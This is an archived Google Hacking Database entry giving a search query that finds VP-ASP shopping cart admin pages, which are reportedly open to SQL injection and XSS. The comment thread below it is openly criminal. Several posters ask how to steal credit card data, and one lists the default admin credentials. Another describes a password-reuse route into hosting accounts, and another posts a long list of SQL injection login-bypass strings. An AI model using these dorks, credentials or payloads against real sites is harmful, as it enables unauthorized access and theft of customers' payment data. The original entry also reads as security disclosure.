GHDB « Hackers For Charity

GHDB


Google Search: inurl:"shopadmin.asp" "Shop Administrators only"

kammo rates this entry 8 out of 10.
Submitted: 2004-06-25 13:11:55
Added by: kammo
Hits: 36435
Score: 8

VP-ASP (Virtual Programming – ASP) has won awards both in the US and France. It is now in use in over 70 countries. VP-ASP can be used to build any type of Internet shop and sell anything. It has been reported that the Shopping Cart Administration script is vulnerable to XSS and SQL injection, resulting in exposure of confidential customer information like credit card details. More information on this attack is available at http://securitytracker.com/alerts/2002/May/1004384.html


Comments:

2004-08-08 21:55:28 (FreQ): Nice 1

2004-09-01 17:12:15 (TheGenius): How can we access Credit Cards.
Can you show me some more info about this??


2004-09-30 23:45:00 (splithorizon852): No CC man, go learn it. No one is going to show you this stuff.

2004-10-01 18:03:01 (yndsport): how can i login into that site if you don’t tell me the trick for me to login

2004-10-27 16:36:25 (Anonymous): Can you give us pls some sql injection passwords for this pages ?

2004-11-07 22:29:17 (Thresh): http://www.techmystics.com/ShoppingCartDemo/shopadmin.asp working

2005-02-25 22:53:06 (immortalz4em): Please i will like if i can get more explanation on this shopping cart issue…..and i hope someone will explain to mii…..u can drop mii d explanation via email….immortalz4em@yahoo.com…thanx again

2005-02-28 03:04:33 (nfsutim): hey guys can we actually order stuff from the site and not have to pay for it??
http://www.vpasp.com/demo550/shopadmin1.asp


2005-03-26 01:04:11 (Twizik): HA HA HA HA HA HA HA *to the post above* the link http://www.vpasp.com/demo550/shopadmin1.asp look it over a few times just read the URL and tell me what you think

2005-03-26 14:47:23 (blackmass): ok this gives you the admin for the website but is no use if you don't have the user's name and password, can anyone tell me how to get the user's name and password? plz

2005-03-26 20:01:50 (alen1): is there another way to hack shopadmin?

2005-03-29 10:48:26 (star): This is really exciting to find all that information through a simple search.

2005-04-14 01:54:55 (InFaDeLiTy): Great, But I Want To Know How You Acquired The Password And Login Name. Just Point Me In The Right Direction To Learn How.

Also, This Is Just To Find The Admin Login For The Site Right Nothing Else?


2005-06-24 02:13:56 (Anonymous):

hey do we still need to use the exploit in order to penetrate the shopping cart?..



2005-07-09 16:44:07 (pinballz): try the default passwords

1. VPASP
Product VP-ASP Shopping Cart
Version
Method HTTP
User ID vpasp
Password vpasp
Level Admin
Notes

2. VPASP
Product VP-ASP Shopping Cart
Version
Method HTTP
User ID admin
Password admin
Level Admin
Notes

i found a few that work

pinB@llZ


2005-07-13 23:20:17 (Anonymous): omg. I can’t believe some people are so stupid. There is a big warning right at the top of the page on a default installation saying “You are using the default passwords. This makes your site open to hackers. Please change your userids and passwords as soon as possible.”

I’ve found a few sites so far using the default admin:admin that are storing credit card info. Judging on the number of customers they aren’t freshly installed carts either so no “I haven’t got around to changing the password yet” excuses…


2005-11-01 06:43:28 (yemi2003): hi guyz, what's happening? A friend of mine told me that ur site is useful in terms of revealing cc info, but to my surprise there is not even a word like that
Please i will like to know if i can get any info on any valid credit card.


2005-12-25 03:05:51 (kasper5150): this doesn't work anymore because everyone has updated…now if u find a new one…cool.

2006-02-09 12:17:21 (userdan): Oh how I despise thee, of little brains…
You people are disgusting…
“LIEK Z0M6 I R NU N00B, NAW GIMME STEP BA STEP HAX HELPCRAFT, OR DIE, PLX!”

Get a life, you morons…. Either that, or learn how to hack, like the rest of us did.
Losers.

btw, i managed to hack a HACKERS email account through this. XD


2006-03-02 22:22:42 (hxun): THIS IS AWESOME~!!!!!!!!
1 of the hosting admin login check customer access email
usually their email is same with the current email pass they entered.
access email, grab others password get infos.. and if their web hosting for ASP is admin/admin whois the hoster check what website is hosted on their server, filter their ASP customers password same admin/admin
u’re IN !!! some won’t work cause they manually changed the password..


2006-04-20 04:21:03 (Noviceshacker): Hacker/novices like me aren't supposed to ask such questions about how to get the username and password to log in to the admin area. If you really wanna become a hacker don't be lazy, why don't you google for sql injection strings and you will find kool strings to log in to the admin area: Below are some examples: insert each sql string into the user/pass field. E.G username:’ or 0=0 — Pass:’ or 0=0 –. Anyway I am a novice in hacking, and I like hacking; if anybody wanna help me to fulfil my dream this is my yahoo Id badestsquard@yahoo.com
Remember hack for fun and not for $$$$$$$$$ hacking for $$$$ is a sin. Thanks, I love Hacking with passion. Thanks to all hackers here that are posting those exploits. It's a pity that I didn't know this stuff on time.

(Variations)

admin’–

‘ or 0=0 –

” or 0=0 –

or 0=0 –

‘ or 0=0 #

” or 0=0 #

or 0=0 #

‘ or ‘x’='x

” or “x”=”x

‘) or (‘x’='x

‘ or 1=1–

” or 1=1–

or 1=1–

‘ or a=a–

” or “a”=”a

‘) or (‘a’='a

“) or (“a”=”a

hi” or “a”=”a

hi” or 1=1 –

hi’ or 1=1 –

hi’ or ‘a’='a

hi’) or (‘a’='a

hi”) or (“a”=”a

Don't Hack for $$$$$$$$$$$$$$$$$ Hack for Fun and u will enjoy hacking



5 Responses to “GHDB”

  1. Jack says:

    Does GHDB still update now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny, been a while since I last came. Aren’t you gonna update this website anymore???

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Are any offline viewable resources available for this product?